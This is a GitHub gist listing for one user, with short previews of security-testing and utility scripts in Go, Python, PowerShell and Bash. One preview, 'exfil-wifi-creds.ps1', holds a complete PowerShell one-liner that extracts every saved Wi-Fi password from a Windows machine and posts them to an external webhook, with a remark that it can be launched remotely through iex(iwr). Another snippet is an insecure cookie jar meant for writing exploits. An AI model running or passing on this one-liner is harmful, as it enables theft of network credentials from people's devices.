fyxme
/ minimalcj.go
Last active
January 17, 2025 23:44
Golang Minimal CookieJar Implementation which always returns all cookies, regardless of domain or url (Insecure but usefull for testing or writing POCs)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| /* | |
| Minimal CookieJar implementation which always returns all cookies (ie. disregard the url passed and cookie domain) | |
| Usefull for testing or writing exploit code (eg. during a CTF where ip/host/domains may be interchanged in the client) | |
| WARNING: Do not use in prod.. this is super unsafe... Just good for testing | |
| Author: fyx.me | |
| gist: https://gist.github.com/fyxme/2bceed4038e2be71ce1deb7e6e9db434 |
fyxme
/ requirements.txt
Created
January 3, 2025 23:54
Using Python to send emails via the Outlook web interface
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| exchangelib |
fyxme
/ replay-http.go
Last active
February 16, 2024 15:58
Replay an HTTP request from a txt file in golang
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| // src: https://gist.github.com/fyxme/25fb9bc7a3c76997ec51da30d3f3e4dd | |
| import ( | |
| "bufio" | |
| "flag" | |
| "fmt" | |
| "io/ioutil" | |
| "net/http" |
fyxme
/ print_har_endpoints.py
Created
December 5, 2023 05:29
Print HAR file endpoints (METHOD + URL)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| # yonked 95% from https://gist.github.com/craSH/892479/raw/21d5c3222739743cad6e6e5c5f1597daecbe560e/har_response_urls.py | |
| # | |
| # Running more than one file: (Cbf updating this script even thought it would be trivial) | |
| # IFS=$'\n' | |
| # for f in `find .. | grep har`; do ./har_response_urls.py "$f"; done | tee all.txt | |
| import json |
fyxme
/ exfil-wifi-creds.ps1
Created
November 1, 2023 20:31
Retrieve and Exfil Wifi Credentials Stored on a Windows Device to an External Webhook
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # A simple powershell oneliner to exfil wifi creds | |
| # most of the code was borrowed from this gist which deserves all the credit: | |
| # https://gist.github.com/CybersamuraiDK/6e0be5c0c47165228895079efa8d98ec | |
| # can also be run using iex(iwr ....) with a shortened url so its easy to type out | |
| $WEBHOOK="https://webhook.site/XXXX" # change this to your own webhook | |
| (netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String "Key Content\W+\:(.+)$" | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_} | %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }} | ConvertTo-Json | %{ curl.exe -d "data=$_" -X POST $WEBHOOK } |
fyxme
/ webserver.go
Last active
November 7, 2024 20:07
Golang webserver with ip and request logging
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| import ( | |
| "fmt" | |
| "log" | |
| "net/http" | |
| "net/http/httputil" | |
| "flag" | |
| "strings" | |
| "os" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| import ( | |
| "errors" | |
| "log" | |
| "net" | |
| "net/http" | |
| "strings" | |
| "net/http/httputil" | |
| "flag" |
fyxme
/ generate-random-credit-card.go
Created
May 28, 2023 14:03
Generate Random Credit Card Numbers with valid luhn algorithm checksum (PCI Data generation for testing only)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| // most of the code comes from this awesome project: https://github.com/Ardesco/credit-card-generator/tree/master | |
| // only use for testing PCI data generation | |
| import ( | |
| "fmt" | |
| "math/rand" | |
| "strconv" | |
| "time" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env bash | |
| version=$(go version|cut -d' ' -f 3) | |
| release=$(curl --silent https://go.dev/doc/devel/release | grep -Eo 'go[0-9]+(\.[0-9]+)+' | sort -V | uniq | tail -1) | |
| if [[ $version == "$release" ]]; then | |
| echo "latest go release already installed: $release" | |
| exit 0 | |
| fi |
fyxme
/ install.sh
Created
April 25, 2023 04:57
— forked from wdullaer/install.sh
Install Latest Docker and Docker-compose on Ubuntu
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Ask for the user password | |
| # Script only works if sudo caches the password for a few minutes | |
| sudo true | |
| # Install kernel extra's to enable docker aufs support | |
| # sudo apt-get -y install linux-image-extra-$(uname -r) | |
| # Add Docker PPA and install latest version | |
| # sudo apt-key adv --keyserver hkp://keyserver.ubuntu.com:80 --recv-keys 36A1D7869245C8950F966E92D8576A8BA88D21E9 | |
| # sudo sh -c "echo deb https://get.docker.io/ubuntu docker main > /etc/apt/sources.list.d/docker.list" |
NewerOlder